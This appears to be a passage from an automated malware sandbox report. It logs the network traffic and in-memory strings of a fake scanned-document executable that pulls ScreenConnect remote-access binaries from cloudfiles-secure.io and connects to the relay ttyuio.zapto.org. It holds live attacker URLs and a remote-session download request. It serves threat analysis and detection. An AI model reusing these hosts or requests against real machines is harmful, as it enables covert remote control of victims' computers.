                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=73549b67-726b-470e-ab1a-fbbb83a6a15b&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
                  Source: global trafficDNS traffic detected: DNS query: cloudfiles-secure.io
                  Source: global trafficDNS traffic detected: DNS query: ttyuio.zapto.org
                  Source: svchost.exe, 00000007.00000003.2156243757.0000022265375000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2165857970.0000022265379000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2156320828.0000022265374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3272112459.0000022265337000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2165831029.0000022265376000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3272173508.000002226535F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS
                  Source: svchost.exe, 00000007.00000002.3272173508.000002226535F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd
                  Source: svchost.exe, 00000007.00000002.3272552281.0000022265A67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3272173508.000002226535F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb
                  Source: svchost.exe, 00000007.00000002.3272552281.0000022265A32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3271223902.0000022264AB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb:pp
                  Source: svchost.exe, 00000007.00000002.3272552281.0000022265A32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2088814426.0000022265A36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3272697084.0000022265A69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb_
                  Source: Scan_doc_09_16_24_1120.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: Scan_doc_09_16_24_1120.exe, 00000000.00000002.2220205014.0000000000D5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustXL9
                  Source: C56C4404C4DEF0DC88E5FCD9F09CB2F10.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt
                  Source: Scan_doc_09_16_24_1120.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                  Source: Scan_doc_09_16_24_1120.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: F2E248BEDDBB2D85122423C41028BFD40.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
                  Source: Scan_doc_09_16_24_1120.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: dfsvc.exe, 00000001.00000002.2784738148.00000227082E0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270845D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.0000022708353000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.0000022708459000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cloudfiles-secure.io
                  Source: svchost.exe, 00000006.00000002.3274283658.000001E585061000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3271223902.0000022264AD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                  Source: Scan_doc_09_16_24_1120.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: Scan_doc_09_16_24_1120.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                  Source: Scan_doc_09_16_24_1120.exe, 00000000.00000002.2220205014.0000000000D5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256Time
                  Source: Scan_doc_09_16_24_1120.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: Scan_doc_09_16_24_1120.exe, 00000000.00000002.2220205014.0000000000D5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.
                  Source: Scan_doc_09_16_24_1120.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                  Source: 77EC63BDA74BD0D0E0426DC8F80085060.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: dfsvc.exe, 00000001.00000002.2793656432.0000022721BC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabB
                  Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD41570.7.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
                  Source: dfsvc.exe, 00000001.00000002.2793865046.0000022721C0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/eni
                  Source: svchost.exe, 00000007.00000003.2209823243.0000022265379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                  Source: svchost.exe, 00000007.00000002.3271914143.0000022265300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAA
                  Source: svchost.exe, 00000007.00000003.2190621904.0000022265378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2168950175.0000022265375000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdes
                  Source: svchost.exe, 00000007.00000003.2156243757.0000022265375000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2190621904.0000022265378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3272256168.0000022265378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2156320828.0000022265374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3271328739.0000022264ADF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2165831029.0000022265376000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2078695040.0000022265329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2168950175.0000022265375000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2209823243.0000022265379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                  Source: svchost.exe, 00000007.00000002.3271914143.0000022265300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdA
                  Source: svchost.exe, 00000007.00000002.3272256168.0000022265378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds
                  Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                  Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                  Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                  Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                  Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                  Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                  Source: edb.log.6.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                  Source: C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F1410.1.drString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxX
                  Source: Scan_doc_09_16_24_1120.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: Scan_doc_09_16_24_1120.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: Scan_doc_09_16_24_1120.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: Scan_doc_09_16_24_1120.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: dfsvc.exe, 00000001.00000002.2792984032.0000022721B00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
                  Source: dfsvc.exe, 00000001.00000002.2791939557.0000022720588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crl
                  Source: svchost.exe, 00000007.00000002.3272942590.0000022265A97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://passport.net/tb
                  Source: svchost.exe, 00000007.00000003.2210637965.0000022264A7D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3272173508.000002226535F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                  Source: svchost.exe, 00000007.00000002.3272112459.0000022265337000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                  Source: svchost.exe, 00000007.00000002.3272173508.000002226535F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3271914143.0000022265300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                  Source: svchost.exe, 00000007.00000002.3272173508.000002226535F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy1p
                  Source: svchost.exe, 00000007.00000002.3272112459.0000022265337000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policyn
                  Source: svchost.exe, 00000007.00000002.3272173508.000002226535F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc1e
                  Source: svchost.exe, 00000007.00000002.3272112459.0000022265337000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scst
                  Source: svchost.exe, 00000007.00000002.3272112459.0000022265337000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3272173508.000002226535F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                  Source: svchost.exe, 00000007.00000002.3272552281.0000022265A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                  Source: svchost.exe, 00000007.00000002.3272173508.000002226535F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issuee
                  Source: svchost.exe, 00000007.00000002.3272173508.000002226535F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issuee2
                  Source: svchost.exe, 00000007.00000002.3272552281.0000022265A32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2088814426.0000022265A36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3272173508.000002226535F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                  Source: svchost.exe, 00000007.00000002.3272173508.000002226535F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                  Source: dfsvc.exe, 00000001.00000002.2784738148.0000022707C61000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.3274199153.0000000001410000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000F.00000002.2941168266.00000000032F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
                  Source: Scan_doc_09_16_24_1120.exe, 00000000.00000002.2220205014.0000000000D5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/
                  Source: Scan_doc_09_16_24_1120.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: dfsvc.exe, 00000001.00000002.2784738148.0000022708125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.o
                  Source: dfsvc.exe, 00000001.00000002.2784738148.00000227081F6000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270806A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.0000022708125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.or
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2283633645.000000000157A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.w3.ora
                  Source: dfsvc.exe, 00000001.00000002.2784738148.0000022707CF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2core
                  Source: dfsvc.exe, 00000001.00000002.2784738148.0000022707CF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2coreS
                  Source: svchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
                  Source: svchost.exe, 00000007.00000003.2056321735.000002226532C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056321735.0000022265329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056402892.0000022265352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056756954.0000022265356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
                  Source: svchost.exe, 00000007.00000003.2056321735.0000022265329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                  Source: svchost.exe, 00000007.00000003.2056321735.0000022265329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056402892.0000022265352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056756954.0000022265356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                  Source: svchost.exe, 00000007.00000003.2056321735.0000022265329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056402892.0000022265352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056756954.0000022265356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                  Source: svchost.exe, 00000007.00000003.2056321735.0000022265329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056402892.0000022265352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056756954.0000022265356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                  Source: svchost.exe, 00000007.00000003.2056321735.0000022265329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270802647.0000022264A27000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056402892.0000022265352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056756954.0000022265356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                  Source: svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                  Source: svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                  Source: svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                  Source: svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                  Source: svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                  Source: svchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056321735.0000022265329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056592993.0000022265357000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3272112459.0000022265337000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056402892.0000022265352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/msangcwam
                  Source: dfsvc.exe, 00000001.00000002.2784738148.00000227082E0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270845D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.0000022708353000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270806A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2794636681.0000022723FB5000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.0000022707EC3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270838D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io
